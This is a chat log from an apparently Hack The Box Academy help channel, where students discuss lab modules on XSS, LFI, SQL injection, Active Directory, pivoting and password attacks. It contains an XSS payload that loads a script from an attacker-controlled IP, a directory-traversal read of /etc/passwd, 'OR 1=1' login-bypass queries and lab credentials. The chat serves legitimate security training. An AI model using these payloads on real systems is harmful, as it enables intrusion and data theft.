vernal tapir
#

I'm just a bit confused on your question truthfully

plain spruce
#

i wonder if they are doing this.

vernal tapir
#

For trimming the nmap scan? No definitely not

plain spruce
#

or something like a regex to remove whitespace you know

#

NOOO LMAO. never mind bro.

vernal tapir
#

You make no sense bro

#

As someone whos 97% in the path, I can tell you that ignore whatever you are thinking, you don't need that

plain spruce
#

dude im literally just asking myself how they handle the input in the input field.
like if they take the string as it is or if they format it with regex or trim to remove whitespace that is all.
that is not even about my question before. its just genereal question

dire coral
#

Hi People! Is there anyone willing to help with the Password Attacks: Credential Hunting in Network Shares module page? I've spent about 5 hours on it and still the second question remains unsolved. I tried each tool discussed on the target, each pattern mentioned, enumerated everything manually, though the only thing I assumed was the right answer was also a dummy. I may provide any details if needed (except the commands I used, cause my PwnBox ended several times). I definitely have missed smth...

plain spruce
#

dude im a software dev and just curious its not about hacking at all rn im wondering about the app.

vernal tapir
#

I won't be able to answer that question, as I have no idea bro. Hopefully someone else can

plain spruce
vernal tapir
faint hamlet
# plain spruce also when i do this nc $ip $port it just loads in terminal and then just stops -...

sorry my bad for misguiding you, most of what I said is generally applicable but smb wants to that special case 😅
So to get smb banner you have three options
nmap -sV and get the version column that is the banner
Wireshark and use smbclient, you would see banner in Wireshark hopefully.
Or make smb initialization request that requires non-printable character so you would have to use python scapy or something similar, that's the reason nc was not working. Again sorry for inconvenience

plain spruce
vague remnant
#

no chat br in server ?

thin citrus
#

Here by screenshot of jd-gui:

tacit ore
#

This might be a dumb question.. But do i need to open HTB and get the target IN my VMware to make it all work? or can i get a target on my own pc and just make sure the OVPN is working?

sinful ermine
#

Under File Inclusion > Local File Inclusion there are lots of code snippets listed that show how the input is sanitized or altered before being passed on to the webpage. For the example page given, where would I find the snippet of code given earlier?

sinful ermine
wild sedge
#

i actually just did this one yesterday,i remember looking around the classes to find credentials

#

it should look like $rcon = new rcon (something, password, somethingelse)

tacit ore
slow swift
#

Get-NetUser -TrustedToAuth is not working in Kerberos Constrained Delegation section in windows attacks & defense module

slow swift
wild sedge
#

any1 know how to fix this? this is pivoting and tunneling > scoksoverRDP (yes i did set it to the modem setting)

opal cape
#

Hey guys I wrote this yesterday but I guess people were signed off. Can anyone help me figure out how to test each field in a login form for XSS session hijacking?

acoustic owl
opal cape
acoustic owl
#

You can do both. I prefer a request and a different payload in each field

opal cape
# acoustic owl The module explains how to do this.

It's just a bit confusing tbh. It says use the payload in each field to send http request back to our server but does that mean I should have nc listener running? Because when I do and submit a feild with the payload I'm not getting any response

acoustic owl
#

I would start a web server. Then you can also see if several fields want to access your web server.

opal cape
#

I'm not a pro at this so sorry if I sound dumb

acoustic owl
acoustic owl
tacit ore
#

Sorry, i keep getting stuck on Nibbler..(i know i know..) i seem to do everything it says yet my rev shell wont work, i get no responding on my -lvnp <port> anyone that could check a bit more in depth where it might go wrong? been working on it for several hours now but i cant find it

acoustic owl
#

The modules are designed so that you learn the basics in the Tier 0 modules. You will expand your knowledge with the Tier I and II modules.

opal cape
#

Also just curious is Active Directory the hardest/longest module in your opinion?

acoustic owl
opal cape
acoustic owl
tacit ore
tame basalt
#

Send me a DM I can help, got notes for all stages of it.

thin citrus
#

@wild sedge But did you found the libs to debug the app locally?

signal hound
#

Hi quick question
Attacking enterprise networks -> external information gathering
The question is:
"Perform vhost discovery, what additional vhost" exists
Im bruting with ffuf, filter the right size but i get some garbage unrelated vhosts with 'size:0'

junior ruin
unborn plaza
#

hi guys
I haven't been able to connect to RDP for 4 days in a row.
AD module - htb academy
i can't share screenshot on the channel. so how to fix it

fathom pendant
#

change vpn regions?

south marten
#

Hi, can I talk to a mod privately?

#

i need to send a photo

fathom pendant
#

can't connect is vague: do you receive errors?

fathom pendant
#

if you want to be able to post images in here there's instructions in #welcome on linking your HTB account to the discord

south marten
#

It's from a password attacks module, where I found the password with LaZagne, but it doesn't accept it as a correct answer.

fathom pendant
unborn plaza
south marten
south marten
unborn plaza
#

RDP a10.129.188.165 (ACADEMY-EA-MS01) user " htb-student " e password " Academy_student_AD! "

[21:02:48:781] [67059:67060] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[21:02:48:781] [67059:67060] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[21:02:48:782] [67059:67060] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp

and i see black screen

unborn plaza
#

nothing change ahah

fathom pendant
#

@south marten ?

unborn plaza
#

this is the output on my terminal
[21:02:48:781] [67059:67060] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[21:02:48:781] [67059:67060] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[21:02:48:782] [67059:67060] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel disp

south marten
unborn plaza
#

and the rdp box is black

fathom pendant
#

the first question on this section has nothing to do with grabbing a password

fathom pendant
south marten
#

is not with LaZagne?

fathom pendant
#

this question, yes?

What is the name of the file stored on a domain controller that contains the password hashes of all domain accounts? (Format: ****.***)

unborn plaza
#

thank you

south marten
#

aaa. im sorry

fathom pendant
#

well that's the "First question" on that section

south marten
#

i confuse the module, is credential hunting

#

the next one

fathom pendant
#

What password does Bob use to connect to the Switches via SSH? (Format: Case-Sensitive) ?

south marten
#

yes, is this one

fathom pendant
#

the answer is We..23

south marten
#

is not ? FS...123

fathom pendant
#

no

south marten
#

thats the password i get wit LaZagne

#

:(

fathom pendant
#

look carefully at what the question asks and what lazagne gave you

#

the password you got was for a different service that bob uses

#

there's also other methods to find passwords that were showcased, not just lazagne

#

lazagne may just show stored passwords

south marten
#

i get winscp password

#

I hadn't noticed

fathom pendant
#

yerp; LaZagne only looks for stored credentials, it doesn't really check other files or programs that may be like password managers

south marten
#

and why if i try to login in winscp with this credentials i get and error

fathom pendant
#

Also it's an internal machine that's being connected to via winscp

#

Scp is a file transfer protocol utilizing ssh to securely transfer files

south marten
#

no?

fathom pendant
#

Yes, also module is above t0, be careful with spoilers

south marten
#

aaa, im sorry

#

but, if im try, why i get and error

fathom pendant
#

You don't really "log in" via scp

#

You utilize the credentials to transfer files

#

scp is a more strict file transfer protocol

south marten
#

so, i dont need to use the password i get? sorry for all this question , but im stucked

fathom pendant
#

Is that what the question is asking you to do?

south marten
#

they ask me to find the password that bob uses via ssh

#

so, i think no

fathom pendant
#

Maybe the credentials are saved in a password manager or a file somewhere

#

You're getting hung up because you found something that wasn't asked for (yet) because you assume the tool used is some sort of all access tool

#

When, if you read the section, it simply tells you that LaZagne only looks for insecurely stored credentials via popular applications

#

I.e. Firefox stored passwords

south marten
#

so. if i want to find the password via ssh, i need to use hydra?

fathom pendant
#

No

#

Everything you need to answer all the questions is found in context of the user you're given

#

Utilize the different methods showcased in the section. Not just lazagne

south marten
#

yea, i have all the anwers, the only i don't know how to do is the ssh :(

fathom pendant
#

I've been hinting at it a fair bit

#

The section hints at utilizing windows search 😉

#

Heck you can probably find it by just clicking around

#

Yep pretty much all the questions are able to be answered without using tools

opal cape
#

Hey chat when it comes to XSS payload what does the double quotes (">) payload do to make it work as opposed to nothing.? For example "> <script src="http://IP:PORT"></script> works but just <script <src="http://IP:PORT"></script>

#

The second one doesnt return anything to my nc listener. My question is why does addin "> work?

fathom pendant
opal cape
fathom pendant
#

<Img src="[image link]"> by injecting a "> you prematurely close the tag, so <img src=""> <your payload>

fathom pendant
#

@south marten you got it figured out?

south marten
opal cape
#

@fathom pendant Hey so if "><script src="http://IP:PORT"></script> works and I tried each field individually and figured out which feild is vulnerable, what would be the point of adding a Directory to the payload like <script src="http://IP:PORT/directory"></script>

fathom pendant
safe torrent
#

Hello!
I'm doing an AD module and i don't understand one thing in this fragment:

"Next, we can use lookupsid.py from the Impacket toolkit to perform SID brute forcing to find the SID of the child domain. In this command, whatever we specify for the IP address (the IP of the domain controller in the child domain) will become the target domain for a SID lookup."

so, when i have this command:
lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240
What should I enter as the IP address? The DC IP of this child domain? Or is it the IP of the compromised child domain?

fathom pendant
#

So you'd use /username for the username field /comment for the comment field, etc

thin citrus
#

Anyone els has the same issue that libs dir does not have jars to debug locally #modules message

safe torrent
#

tysm!

opal cape
fathom pendant
opal cape
fathom pendant
#

The purpose is to call back to your system

#

By using the field /username in the username field, for instance, when you call back to your system you know it's the username field that's vulnerable

safe torrent
# fathom pendant The DC it looks like

Tbh I have another problem, a little below it says:

Next, we can rerun the command, targeting the INLANEFREIGHT Domain Controller (DC01) at 172.16.5.5 and grab the domain SID S-1-5-21-3842939050-3880317879-2865463114 and attach the RID of the Enterprise Admins group

So is this definitely the ip of the DC child domain?

fathom pendant
south marten
#

i found the gitlab password before de ssh

fathom pendant
#

Or even look at the folder labeled "work stuff"

south marten
#

...

opal cape
fathom pendant
south marten
#

I thought it was much more difficult, i am just stupid

fathom pendant
#

It's not about the corresponding directory being revealed

south marten
#

I stopped looking at Workstuff since I found the GitLab credentials.

fathom pendant
#

It's just a way to say "this field is vulnerable" without having to refresh a million

opal cape
#

No what i meant by corresponding is it will return whatever directory name that I put for a feild thats vulnerable

opal cape
#

Tha ks for clarification

safe torrent
cerulean holly
#

Please help me how can I pay for monthsly billing as a student 🥹

cloud urchin
south marten
cerulean holly
vital zodiac
#

Hi
I'm stuck in this question:
Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Either create a new visualization or edit the "Failed logon attempts [Disabled user]" visualization, if it is available, so that it includes failed logon attempt data related to disabled users including the logon type. What is the logon type in the returned document?

I searched through the SIEM and I findout the LogonType is 2, and I got the answer is incorrect.

Please anyone help?

south marten
#

hey, im doing active directory and NTDS, and im doing the kerbrute and i have and error with the domain

quasi wave
#

hi guys. after a week of finishing my photoshop final assignment and taking three days to get some other stuff done I had to get done, I am back in the skills assessment for pivoting, tunneling, and port forwarding module. I am trying to use ligolo to do it and I'm having some issues but I think if I post a screenshot it will spoil something so is anyone available to DM?

#

I'm using @gray yacht 's video on ligolo to do the assignment

#

I am able to get past the first pivot but the second pivot is not working

#

so having trouble not on single pivot but on double pivot

crisp solstice
quasi wave
wild sage
quasi wave
#

hi guys I have managed to get through the double pivot portion of the skills assessment for pivoting, tunneling, and port forwarding. I am on the second to last question. I managed to get the IP address of the internal network to appear. I think I have the username of the second RDP to get to. But now I need to find the password for the user in order to do a second RDP. I was able to RDP into first pivot into Windows host. But now there's another Windows host deeper in the network I want to connect to. I know RDP port is open on the machine.

I'm guessing its like a triple pivot I need to do?

quasi wave
#

so I got first pivot to work and I got second pivot host done with ligolo

#

but I'm having trouble finding RDP creds for third pivot

#

I know port RDP is open

#

on the host

waxen totem
#

Cant recall really, but I'd recommend more enumeration

quasi wave
#

ok

#

ok I'll figure it out later I gotta go the cafe I'm working at is closing soon

#

will try again later tonight

clear seal
#

AD enumeration and attacks has been the most giant module..lol

gray leaf
#

Thank you for posting this. I was not giving it 10-15 mins before I'd decline and try again and I was getting really frustrated 😦

merry smelt
#

Does the bug bounty path on HTB really teach you everything to do bug bounties on Hackerone?

wild sage
#

It helps with it

clear seal
#

Brain recoup time until tomorrow….

velvet pawn
#

I am having issues logging in to my academy account, anyone that could give me a hand with that?

fathom pendant
#

support

compact patrolBOT
velvet pawn
#

thanks, giving it a try

#

that support chatbot was a very confusing experience... and in the end just told me "we will be back tomorrow", I still cant access my account...

nova pecan
#

Password Attacks modules have no answers under "show solution". Is that expected? Will there eventually be solutions?

cloud urchin
#

The whole module had a makeover just a few days ago so the walkthrough most likely just hasn't been updated quite yet

fathom pendant
#

You generally shouldn't need the solutions anyway

nova pecan
fathom pendant
#

I am new as well, and I have my opinions on the solutions that I've voiced before.

nova pecan
fathom pendant
#

You can ask for nudges in here on the module/section you're having issues with and someone can push you in the right direction

#

I generally dislike just giving the solution just bc you're stuck, imo it just reinforces bad habits when you can just click a button and get the answer

cloud urchin
#

@stuck hollow please make sure not to spoil content from modules above tier 0. (hostnames, passwords, usernames, etc)

cloud urchin
#

It can't find the realm, make sure to add the appropriate hostnames to your hosts file and make sure you're on the vpn etc

stuck hollow
#

vpn is ok

indigo terrace
#

hello 👋
is this where i can ask questions from the web requests module?

waxen totem
indigo terrace
#

awesome!

#

so um im doing the web requests module and for some reason the pwnbox doesn't connect to inlanefreight.com?

#

should i be putting more info into the curl?

stuck hollow
waxen totem
cloud urchin
indigo terrace
indigo terrace
#

yea so i got it basically you need to
curl -O https://(IP):(PORT)/{file you want it to be}
and then vim it

dusky rain
storm elk
dusky rain
waxen totem
fathom pendant
waxen totem
storm elk
#

Them potatoes be going rogue

dusky rain
#

Hey , just a non-pentesting question, how do you guys send screenshots in this chat. I have tried ctrl+c, ctrl+v,,,,, + (plus) button to the left of this chat box,,,,and also drag&drop.....Is that just me or anyone else also having such an issue

high lynx
#

Hello guys hope you are all doing well.
I am new to this field. Till now I have solved only 2 rooms in htb and counting more in the upcoming days.
Could you provide some suggestions/advice how shall I proceed with this journey.
If I am asking it in the wrong chat please redirect me to the right place. Thank you😊.

cloud urchin
cloud urchin
dusky rain
fathom pendant
dusky rain
fathom pendant
#

as @cloud urchin pointed out to the other person; there's instructions in #welcome to link

dusky rain
dusky rain
wooden seal
#

windows priv esc (useful tools) tool name watson (description - Watson is a .NET tool designed to enumerate missing KBs) Whats refered as KBs here? (I already googled this stuff but i had 0 clue after searching too)

faint hamlet
#

Is there any alternative to droopescan for Joomla and drupal enumeration? As droopescan is not maintained and cannot be used with python3.13 and I don't want to manage multiple python instances.

wooden seal
#

i did it without any obstacles i remember

#

otherwise theres a tool - joomscan try that maybe

compact patrolBOT
cloud urchin
#

This channel is for discussion of the various modules on Academy. You'll need to read the #rules and follow the instructions in #welcome to gain access to most of the server. Then you can post your questions in #general or #1024429874246590575 etc.

spice thicket
cloud urchin
#

what?

#

you didn't follow the instructions like i said

spice thicket
faint hamlet
# wooden seal i think it works with python2 command

they changed it to python3, may need to go back to python2 version. But python3 version is giving following output even with docker.

┌──(faiz㉿FAIZ-XEON)-[~/tools/droopescan]
└─$ sudo docker build -t droope/droopescan .
...snip...

┌──(faiz㉿FAIZ-XEON)-[~/tools/droopescan]
└─$ sudo docker run --rm droope/droopescan
Traceback (most recent call last):
  File "/usr/local/bin/droopescan", line 3, in <module>
    from dscan import droopescan
  File "/app/dscan/droopescan.py", line 4, in <module>
    from cement.core import backend, foundation, controller, handler
  File "/usr/local/lib/python3.13/site-packages/cement/core/foundation.py", line 8, in <module>
    from ..core import output, extension, arg, controller, meta, cache, mail
  File "/usr/local/lib/python3.13/site-packages/cement/core/extension.py", line 8, in <module>
    from imp import reload  # pragma: no cover
    ^^^^^^^^^^^^^^^^^^^^^^
ModuleNotFoundError: No module named 'imp'
high lynx
#

So for discussing issues faced in any machine or even asking for advice, where do we ask them? Can we do it here or are there any separate channels for that?

faint hamlet
cloud urchin
wooden seal
young sentinel
#

Howdy, I really hope I am in the right place for this, if not sorry for the intrusion. I was reading though some of the modules and I saw MacOS Fundamentals you need access to an Apple product? So there is no spawning the in house machine to do this lesson? Thanks for the help.

storm elk
fathom pendant
blazing chasm
#

Hey guys, I am on the sqli fundamentals and subverting query logic and want to know the difference between these two queries. In the second one username was tom and it logged in as admin

faint hamlet
severe inlet
#

Hello just wanted to ask if its possible to do the skills assessment of pivoting module with ligolo-ng?
Since every review of CPTS exam i saw used ligolo-ng i thought of learning it and try to finish the skills assessment with it

storm elk
#

Why don't you try it and find out?

silver ocean
#

Hi I am on LFI https://academy.hackthebox.com/module/23/section/251, basic LFI lab, the connection is resetting when I enter ../../../../etc/passwd however, I watched a solution it used to same payload to read passwd file. Is there something wrong with this lab?

signal lava
#

Hi Folks, I try out here again.
I have contacted HTB Support about an "issue". Unfortunately, the problem seems to be on my side.
So, on this module https://academy.hackthebox.com/module/87/section/906, there is a question at the end. I am 100% sure about the answer. However, it seems to be false. I have crosschecked, and it is sure it's the good answer. There is some typography specificities ? I don't get why there is an error to be honest... :/

pure seal
# blazing chasm Hey guys, I am on the sqli fundamentals and subverting query logic and want to k...

Query 1:
SELECT * WHERE username = "tom" OR (1=1 AND password = "")
Output:
Returns only 1 row, the tom user. 2nd part of the query (after the OR) returns no rows because although 1=1, nobody's password is blank (" ")

Query 2:
SELECT * WHERE (username = "tom" AND password = "") OR 1=1
Output:
Returns all users in the table. 1st part of the query is false because tom has a password (it is not blank), so no rows are returned. Second part of the query (1=1) is always true so it returns all users in the table. You are logged in as admin because the app logic is written to log you in as the first returned row, which can be anyone, which in this lab's case is admin.

Why is the first row retruned admin when selecting *? I'm not sure. Maybe because admin was the first user inserted into the database.

severe inlet
reef sonnet
#

why there is no cheatsheet in session security module?

pure seal
waxen totem
pure seal
severe inlet
pure seal
fathom pendant
#

^

#

the module came out before ligolo-ng was a thing, and even then when people were picking up on it at first it was in the EARLY dev stages like 0.4.2 or something like that

#

could HTB add a whole ligolo section? maybe

waxen totem
fathom pendant
#

maybe towards the end of it

#

but i do agree that ligolo-ng trivializes learning the rest of it, and that you should grasp the fundamentals before using it

blazing chasm
#

thank you @waxen totem and @pure seal I overlooked the parenthesis part

waxen totem
severe inlet
#

Just finished the pivoting module skills assessment with ligolo that tool is amazing
I will also redo the skills assessment with the things taught in the module
I really enjoyed this one lol

Thank you everyone

rustic sage
#

I did ssh into the target, but I am not able to understand what to do exactly :=[

young sentinel
#

Tried to open my pwnbox and well something went wrong and I get to wait until tomorrow to try again. I am on the Windows Fundamentals and when I went to interact, it was not interacting, just the starting ... and nothing. Can I do this in my own VM?

safe star
#

are you trying to replace the pwnbox or the target?

#

you cant replcae the target

young sentinel
#

pwnbox

safe star
#

yeah vm instead of the pwnbox is fine

pure seal
young sentinel
#

I got connection fail.

pure seal
young sentinel
#

well, ummm, not really kind of. I downloaded it I guess thats also missing...

#

but how do I do that, connect to the VPN.

pure seal
edgy birch
#

Hi, Iam new here and have a question…what is the “academy VPN” for?

fathom pendant
#

if you're using the pwnbox you don't need to download/use it, the pwnbox (in-browser vm) connects automatically

edgy birch
#

Ohhh okayyy, thanks!

rustic sage
fathom pendant
#

you have some localhost ips in there

#

also grepping for 0.0.0.0 is misleading, and that really shouldn't be the way you tackle the question

#

0.0.0.0 is just a wildcard address

#

something may be listening on a specific interface (that's not localhost) and not be 0.0.0.0

rustic sage
fathom pendant
#

you'll want to inverse grep (grep -v for 127.0.0, knowing the localhost ip range is useful here)

fathom pendant
rustic sage
#

ok so we need to exclude the localhost ips

#

using grep -v

fathom pendant
#

that's what the question tells you, doesn't it?

#

it wants the count of all listening interfaces that AREN'T localhost OR ipv6

rustic sage
#

ok

#

thanks

fathom pendant
#

you already got the list for not ipv6 with the '-4' option lumped in

#

just gotta work through the rest :)

pure seal
fathom pendant
#

grepping 0.0.0.0 isn't the same as starting a service listening on 0.0.0.0 as well

#

grep is searching the string value

pure seal
#

of course counting only 0.0.0.0s in the local address column

fathom pendant
#

which is misleading

#

because NOT ALL SERVICES may be on 0.0.0.0

#

even discounting the localhost services

pure seal
#

well if a service is set to listen on ALL interfaces, its gotta be on 0.0.0.0 right?

fathom pendant
#

you're kind of teaching bad practice saying to grep for 0.0.0.0

pure seal
#

i see

fathom pendant
#

while yes, if a service is listening on all it'll be on that -- if a service is listening on one (and not 127.x.x.x) then you'll very easily miss something that could lead you forward

#

for instance it's running an internal share only accessible on one interface so that other computers on that specific network can access it

pure seal
#

that makes sense, but for the purpose of the question which is to find services listening on ALL, is there a better way other than to grep for 0.0.0.0 and maybe also use awk to get the local address column only?

fathom pendant
#

think beyond the purpose of the question specifically

#

you'd want a command that can be used generally, that gathers the most amount of information that you want and only excludes the information you don't

#

while in that specific instance, it works fine, think flexibly

#

by telling someone only to grep for 0.0.0.0 doesn't actually answer the question being posed.

rustic sage
#

guys, I am just in Linux fundamentals, do u recommend any book to understand all this networking with ipv4, ipv6, what is wildcard and :: this double :: thing when I netstat?... I am very confused...

fathom pendant
#

the question being posed is asking for NOT localhost OR ipv6

#

so you're going to look for a command or string of commands that answers NOT localhost OR ipv6

fathom pendant
#

:: is ipv6

#

for instance 0.0.0.0 being a wildcard means that it will listen on all available interfaces on the device

#

this happens when you start a web server or something without specifying the interface name or ip (depending on the program)

fathom pendant
#

if you run python3 -m http.server it will, by default, start on all interfaces on port 8000

#

and instead of listing out all the interfaces it's on, it's shorthanded to 0.0.0.0, which in networking means all

#

so you'll get the output
started http server on 0.0.0.0:8000

south marten
fathom pendant
#

correct my example command i explained how it works by default, without specifying a port

south marten
fathom pendant
#

i'm aware, and i'm being very general here

#

i'm not trying to overcomplicate the explanation by throwing in additional circumstances

south marten
#

Im saying to User 49, i know you know a lot more

rustic sage
#

ok so "services" on my laptop "listen" from "interfaces" on my laptop. Now to find "ports" being used I use "netstat" where "l" means "listen" and I grep for "0.0.0.0" which is also called as "wildcard" so this weird looking ip "0.0.0.0" listens to available "interfaces" on the device and that's what the question is asking...

fathom pendant
#

so grep doesn't treat 0.0.0.0 as a wildcard

#

it treats it as a string

#

the common wildcard in grep is *; which captures everything

#

with grep you are telling it to search for a pattern

#

to keep it simple

word
alpha
word2

if you do grep on that text list; for instance grep word it will give you the lines that contain the pattern "word"; this includes the line with word2

rustic sage
#

I do get what grep does because it was there in the linux fundamentals reading content

fathom pendant
#

so it's not treating 0.0.0.0 the same as a tool that starts a listening service is

#

it's just treating it as the string "0.0.0.0"; meaning anything if that pattern exists anywhere in the line, it matches

#

it doesn't discriminate table fields

rustic sage
#

ok got it :] thnx very much

fathom pendant
#

0.0.0.0 being referred to as wildcard is ONLY in the networking sense, outside of networking it's just another string

#

which is why, if you noticed in the output, several of the listening ones (that are on the localhost range) weren't just 127.0.0.1; though we typically associate 127.0.0.1 as THE localhost address

#

127.0.0.54 i believe was one of the local listening services

rustic sage
#

ohk .. I thought at one point that 127.0.0.1 was localhost range but actually it is 127.0.0

fathom pendant
#

it's actually 127.0.0.0/8 meaning 127.0.0.1 -> 127.255.255.255

#

(though technically it's the loopback, localhost is the more common term)

rustic sage
#

ok 0 to 255

#

gotcha

fathom pendant
#

but the main thing to remember with localhost: the only machine on the network that can connect to a machine's localhost is itself

#

as long as you understand the basics of it; you're fine. HTB has 2 basic networking modules if you want the basics that you'd learn for something like Net+

#

overall you won't need to really know addressing and assigning ips, the networking knowledge more serves as a shorthand for understanding than as a "hey you're gonna have to create subnets"

rustic sage
#

thnx for all the help

south marten
#

How password attacks can be tier 1 💀

fathom pendant
#

because it's not a fundamental or basic topic

south marten
#

Basics topics are Other tier?

fathom pendant
#

well it's also just a general classification. Tier 1 would be like saying "you understand the fundamentals of what's being discussed, so let's actually get into it"

#

i definitely say it should be tier 1; maybe tier 2 -- but def not tier 0

#

it's not extremely complex and doesn't require much moderate knowledge to be able to understand it, and things are mostly still explained

open crater
#

Hi

storm elk
#

👋

gloomy stump
#

Hi can someone give me a hint on Skills Assessment from the File Upload Attacks Modul, please?

#

I don't want to spoiler anything so dm please

signal lava
young sentinel
#

cd .

torpid river
#

How do i solve this:

What other user in the domain has CanPSRemote rights to a host?

It is on the Privileged Access section of the Active Directory enum and attacks module

young sentinel
#

So I did the openvpn and now it seems stuck. Last line reads 2025-6-11 09:36:39 Protocol options: explicit-exit-notify 1, protocol-flags cc-exit tls-ekm dyn-tls-crypt

#

btw I am using ubuntu not kali

#

I think I figured it out

torpid river
fathom pendant
#

i believe that bloodhound has a built-in query

river shadow
#

hello i have problem in some Q he ask Which kernel release is installed on the system? (Format: 1.22.3) I answer 6.11 he say its wrong another Qustion What is the name of the network interface that MTU is set to 1500? my answer is tns0 he say wrong I try another one ens3 because i find tow in MTU set ens3 tns0 he say wrong for both I try every answer and Ican skip it anyone can help me

young sentinel
#

Why am I not getting in. I have the openvpn in a seperate tab and I keep getting this when I do xfreerdp.

river shadow
#

boys anyone help me with my?? problem

#

hello i have problem in some Q he ask Which kernel release is installed on the system? (Format: 1.22.3) I answer 6.11 he say its wrong another Qustion What is the name of the network interface that MTU is set to 1500? my answer is tns0 he say wrong I try another one ens3 because i find tow in MTU set ens3 tns0 he say wrong for both I try every answer and Ican skip it anyone can help me

#

─[eu-academy-5]─[10.10.15.16]─[htb-ac-1828761@htb-vhpfldfkvh]─[~]
└──╼ [★]$ uname -r
6.11+parrot-amd64
┌─[eu-academy-5]─[10.10.15.16]─[htb-ac-1828761@htb-vhpfldfkvh]─[~]
└──╼ [★]$ ifconfig
ens3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 83.136.253.137 netmask 255.255.252.0 broadcast 83.136.255.255
inet6 fe80::a4ba:3bff:fe08:7997 prefixlen 64 scopeid 0x20<link>
ether a6:ba:3b:08:79:97 txqueuelen 1000 (Ethernet)
RX packets 8987 bytes 41708094 (39.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7100 bytes 6570384 (6.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 9831 bytes 5940284 (5.6 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9831 bytes 5940284 (5.6 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.15.16 netmask 255.255.254.0 destination 10.10.15.16
inet6 fe80::5c24:8b57:211d:57ee prefixlen 64 scopeid 0x20<link>
inet6 dead:beef:2::110e prefixlen 64 scopeid 0x0<global>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 72 bytes 6048 (5.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 78 bytes 6372 (6.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

┌─[eu-academy-5]─[10.10.15.16]─[htb-ac-1828761@htb-vhpfldfkvh]─[~]
└──╼ [★]$

wintry cliff
#

Guyz if you want minecraft premium account DM fast

torpid river
outer saffron
#

someone know how to hack?

#

im not trying to hire i wanted help because one of my friend hacked me and put all his stuff in a hosting server the reis host im trying to get it back

#

i really wanted to see if someone could help me

fathom pendant
#

that's not what this server is about

outer saffron
#

all my payment methods are there

safe star
fathom pendant
#

what you're asking for is illegal

outer saffron
#

is illegal to ask help here??

fathom pendant
#

reach out to the authorities

fathom pendant
outer saffron
#

oh

acoustic owl
outer saffron
#

sorry just wanted to see if someone could help

safe star
outer saffron
#

my bad

fathom pendant
outer saffron
#

sorry

#

idk where to ask help anymore

fathom pendant
#

the authorities :))

acoustic owl
#

The only place that may be able to help you is the local police

torpid river
open crater
#

Why my name loren

#

What do I do

acoustic owl
river shadow
#

every one please help ?? some one answer

cobalt lichen
#

hey guys why can't i send screenshot in here?

open crater
#

?

acoustic owl
#

It says how you can change your name

river shadow
#

I have problem in some Q he ask Which kernel release is installed on the system? (Format: 1.22.3) I answer 6.11 he say its wrong another Qustion What is the name of the network interface that MTU is set to 1500? my answer is tns0 he say wrong I try another one ens3 because i find tow in MTU set ens3 tns0 he say wrong for both I try every answer and Ican skip it anyone can help me

#

─[eu-academy-5]─[10.10.15.16]─[htb-ac-1828761@htb-vhpfldfkvh]─[~]
└──╼ [★]$ uname -r
6.11+parrot-amd64
┌─[eu-academy-5]─[10.10.15.16]─[htb-ac-1828761@htb-vhpfldfkvh]─[~]
└──╼ [★]$ ifconfig
ens3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 83.136.253.137 netmask 255.255.252.0 broadcast 83.136.255.255
inet6 fe80::a4ba:3bff:fe08:7997 prefixlen 64 scopeid 0x20<link>
ether a6:ba:3b:08:79:97 txqueuelen 1000 (Ethernet)
RX packets 8987 bytes 41708094 (39.7 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 7100 bytes 6570384 (6.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 9831 bytes 5940284 (5.6 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9831 bytes 5940284 (5.6 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.15.16 netmask 255.255.254.0 destination 10.10.15.16
inet6 fe80::5c24:8b57:211d:57ee prefixlen 64 scopeid 0x20<link>
inet6 dead:beef:2::110e prefixlen 64 scopeid 0x0<global>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 72 bytes 6048 (5.9 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 78 bytes 6372 (6.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

┌─[eu-academy-5]─[10.10.15.16]─[htb-ac-1828761@htb-vhpfldfkvh]─[~]
└──╼ [★]$

autumn pilot
#

Make sure you have SSH'ed into the target

slim locust
#

YARA & Sigma for SOC Analysts
Page 5
Hunting Evil with YARA (Linux Edition)

Can someone help me with this problem? I am for some reason not understanding what processes I am looking for when I do the yarascan.

wooden seal
#

not related to modules but was curious that any of you tried disabling defender using powershell or cmd? or is there any modules on htb regarding it

west arrow
#

